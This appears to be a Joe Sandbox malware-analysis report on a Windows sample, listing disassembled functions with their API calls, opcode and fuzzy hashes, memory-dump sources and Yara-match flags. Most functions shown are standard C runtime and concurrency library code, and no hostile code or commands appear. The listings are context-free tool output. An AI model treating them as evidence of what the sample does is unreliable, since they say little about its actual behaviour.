                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                    • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                                                    Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                    • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                                                    Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: pScheduler
                                                                                                                                                                                                                                                                    • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                                                    • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                    • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                                                    Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                                                                                                                    • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                                    • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                    • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                                                    Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                                                                                    • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                    • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                                                    Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: pScheduler$version
                                                                                                                                                                                                                                                                    • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                                    • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                    • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                                                    Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                    • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                                    Function 024F5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                    • Instruction ID: f894a45ef626dd1adfb82ee4a64b7b95086c45a33f7f4bc7b5ae4f5ad488d0db
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7A169729017869FE765CF18C8847AFBBE1EF92354F58816FD6859B381C3348942CB51
                                                                                                                                                                                                                                                                    Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                    • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                                                    Function 024FFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                    • Instruction ID: fe7958175614dcaeddd9998412e9dc69700130642446567cac0f93f24014a17f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A413E33A002156BFBA46FB98C44BBF3A66EFC1730F16065BF72AD66D0DB3444458A61
                                                                                                                                                                                                                                                                    Function 024F6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024F047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024F6B51
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024F6BDA
                                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024F6BEC
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 024F6BF5
                                                                                                                                                                                                                                                                      • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                    • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                    • Instruction ID: bde06e3fe233c29f72e09ac2985bca0aebc39ba2660dc752e23c683269eaf794
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12311232A0021AABDF24CF65CC40DAF7BAAEF80714F06026EED24D7250EB35C951CB90
                                                                                                                                                                                                                                                                    Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                                                                                                                    • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                    • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                                                    Function 024CD652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                                                                                                                    • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                    • Instruction ID: 646cc8fe2d83adde2bde8f9c11e81b4c899ec82ede90ad52a219de731c094558
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02214F79E0010AAFDF40EF99CC819BEB7B9EF09714F20006EE605A7250D775AD01CB90
                                                                                                                                                                                                                                                                    Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                                                      • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2630251706-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                    • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                                                    Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                                                    • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1339878773-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                    • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                                                    Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                                                      • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                                                      • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 737400349-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                    • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                                                    Function 024E9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 024E934A
                                                                                                                                                                                                                                                                      • Part of subcall function 024E9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024E92C6
                                                                                                                                                                                                                                                                      • Part of subcall function 024E9297: ___AdjustPointer.LIBCMT ref: 024E92E1
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 024E935F
                                                                                                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024E9370
                                                                                                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 024E9398
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 737400349-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                    • Instruction ID: 83a4e2b0a4ac421c46b98e6dfee527748f83cfdcc750ee235303394c005fd0fa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC011772100148BBEF126E96CC40EEB3F6AEF48755F054419FE499A160D372E861ABA0
                                                                                                                                                                                                                                                                    Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
